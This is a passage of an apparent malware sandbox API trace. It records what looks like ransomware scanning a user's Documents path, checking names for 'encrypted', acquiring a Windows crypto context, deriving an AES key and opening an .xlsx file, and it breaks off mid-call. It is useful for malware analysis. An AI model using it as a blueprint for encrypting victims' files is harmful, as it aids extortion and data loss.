HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="07meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="So66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Qt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PRo_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ro_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="og0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZRj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Rj3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="j3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GGg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Gg2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vkusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kusl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="usl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sl20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l20.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.885] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.885] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0033.885] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0033.885] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0033.886] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.886] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.886] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.886] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.886] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c03bc60, ftCreationTime.dwHighDateTime=0x1d5bcc0, ftLastAccessTime.dwLowDateTime=0xe68a5ae0, ftLastAccessTime.dwHighDateTime=0x1d5c1a1, ftLastWriteTime.dwLowDateTime=0xe68a5ae0, ftLastWriteTime.dwHighDateTime=0x1d5c1a1, nFileSizeHigh=0x0, nFileSizeLow=0x15bf2, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="GGg2Vkusl20.xlsx", cAlternateFileName="GGG2VK~1.XLS")) returned 0x7c2100 [0033.886] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0033.886] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0033.886] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.886] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0033.886] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0033.886] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.886] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.886] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5c40) returned 1 [0033.888] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0033.888] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0033.888] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0033.888] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0033.888] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.888] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0033.888] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.888] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0033.888] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.888] CryptCreateHash (in: hProv=0x7d5c40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0033.888] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0033.888] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.888] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.889] CryptHashData (hHash=0x7c2240, pbData=0x7c7758, dwDataLen=0x100, dwFlags=0x1) returned 1 [0033.889] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.889] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0033.889] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.889] CryptDeriveKey (in: hProv=0x7d5c40, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2280) returned 1 [0033.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0033.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0033.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0033.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0033.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0033.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0033.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0033.889] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.889] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0033.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0033.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0033.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0033.889] CryptDestroyHash (hHash=0x7c2240) returned 1 [0033.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0033.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0033.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0033.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0033.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0033.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0033.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0033.890] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx" (normalized: "c:\\users\\5p5nrgjn0js 